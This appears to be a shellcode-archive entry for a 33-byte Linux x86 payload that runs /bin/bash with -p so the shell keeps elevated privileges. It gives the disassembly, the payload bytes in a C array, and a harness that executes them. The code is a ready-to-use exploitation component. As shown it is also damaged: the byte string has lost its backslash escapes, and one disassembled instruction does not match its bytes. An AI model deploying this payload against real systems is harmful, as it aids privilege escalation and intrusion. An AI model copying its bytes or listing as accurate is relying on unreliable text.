[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
# Published : 2010-05-04
# Author : Jonathan Salwan
# Previous Title : Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
# Next Title : Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode


/*

Title: 	Linux x86 - execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 33 bytes
Author:	Jonathan Salwan
Mail:	submit@shell-storm.org
Web:	http://www.shell-storm.org

!Database of Shellcodes http://www.shell-storm.org/shellcode/


sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49

sassembly of section .text:

08048054 <.text>:
 8048054:	6a 0b                	push   $0xb
 8048056:	58                   	pop    %eax
 8048057:	99                   	cltd   
 8048058:	52                   	push   %edx
 8048059:	66 68 2d 70          	pushw  $0x702d
 804805d:	89 e1                	mov    %esp,%ecx
 804805f:	52                   	push   %edx
 8048060:	6a 68                	push   $0x68
 8048062:	68 2f 62 61 73       	push   $0x7361622f
 8048067:	68 2f 62 69 6e       	push   $0x6e69622f
 804806c:	89 e3                	mov    %esp,%ebx
 804806e:	52                   	push   %edx
 804806f:	51                   	push   %ecx
 8048070:	53                   	push   %ebx
 8048071:	89 e1                	mov    %ecx,%ecx
 8048073:	cd 80                	int    $0x80

*/

#include <stdio.h>

char shellcode[] = "x6ax0bx58x99x52x66x68x2dx70"
		   "x89xe1x52x6ax68x68x2fx62x61"
		   "x73x68x2fx62x69x6ex89xe3x52"
		   "x51x53x89xe1xcdx80";

int main(int argc, char *argv[])
{
       	fprintf(stdout,"Length: %dn",strlen(shellcode));
	(*(void(*)()) shellcode)();       
}